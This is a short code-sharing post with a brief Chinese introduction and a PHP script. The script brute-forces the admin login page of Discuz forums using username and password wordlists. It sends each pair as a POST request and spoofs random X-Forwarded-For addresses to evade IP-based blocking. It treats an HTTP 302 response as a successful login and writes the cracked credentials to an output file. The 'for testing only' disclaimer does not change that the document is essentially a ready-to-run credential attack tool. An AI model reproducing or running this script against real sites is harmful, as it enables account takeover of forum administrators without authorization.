2024-01-05 13:17:10
自己写的,爆破discuz后台的,基于字典的,仅供测试。勿用于非法用途 PHP ?php/**Author : fengxuanDate : 2014-11-23 */class FuckDiscuz{public $userfile;public $passfile;public $outfile;public $url;public function __construct($argv,$argc){$this-i
自己写的,爆破discuz后台的,基于字典的,仅供测试。勿用于非法用途 PHP
init($argv,$argc); $this->crack(); } private function init($argv,$argc){ if(!isset($argv) || $argc != 7 || $argv[1]!='-v' || $argv[2]!='-o' ) $this->show(); $this->userfile = $argv[count($argv)-2]; $this->passfile = $argv[count($argv)-1]; $this->outfile = $argv[3]; $this->url = $argv[count($argv)-3]; } private function sock_post($url,$query){ $info = parse_url($url); $fp = fsockopen($info['host'],80,$error,$errstr,30); $head = "POST ".$info['path']." HTTP/1.0\r\n"; $head .= "HOST: ".$info['host']."\r\n"; $head .= "X-Forwarded-For: ".$this->X_Forwarded_for()."\r\n"; $head .="Content-type: application/x-www-form-urlencoded\r\n"; $head .= "Content-Length: ".strlen(trim($query))."\r\n"; $head .= "\r\n"; $head .= trim($query); $write = fputs($fp, $head); while (!feof($fp)){ $line = fgets($fp); if(preg_match('/HTTP\/1.1 302/i', $line)){ $temp = explode('&', $query); $temp[0] = substr(strstr($temp[0], '='), 1); $temp[1] = substr(strstr($temp[1], '='), 1); echo "\r\n\r\nCongratulations! \r\nThe username is \r\n".$temp[0]." and password is \r\n".$temp[1]."\r\n"; $this->savefile($this->outfile, $temp[0] , $temp[1] ); } //echo $line."
"; } } private function X_Forwarded_for(){ $xip = rand(1, 255).".".rand(0, 255).".".rand(0, 255).".".rand(1, 254); if (preg_match('#^(10|172\.16|192\.168)\.#', $xip)) { continue; } return $xip; } private function savefile($file,$user,$pass){ $fp = fopen($file, 'w+'); $string = "username ".$user." password ".$pass."\r\n"; fwrite($fp, $string); fclose($fp); } private function crack(){ $userfile = file($this->userfile); $passfile = file($this->passfile); $userarr = array(); $passarr = array(); foreach ($userfile as $user=>$value){ $userarr[$user] = $value; foreach ($passfile as $pass=>$value){ $passarr[$pass] = $value; $data = array( 'admin_username'=>$userarr[$user], 'admin_password'=>$passarr[$pass], 'submit'=>'提交' ); print "Try crack with: \t".$userarr[$user]." and \t".$passarr[$pass]." \r\n"; $data = str_replace('%0D%0A', '',http_build_query($data)); $this->sock_post($this->url, $data); } } } private function show(){ $string =-v : According to cracking process -o [file] : The output file to save eg: php.exe fuckdz.php -v -o result.txt http://www.xxx.com/admin.php user.txt pass.txt eof; print $string; exit(); } } new FuckDiscuz($argv,$argc); ?>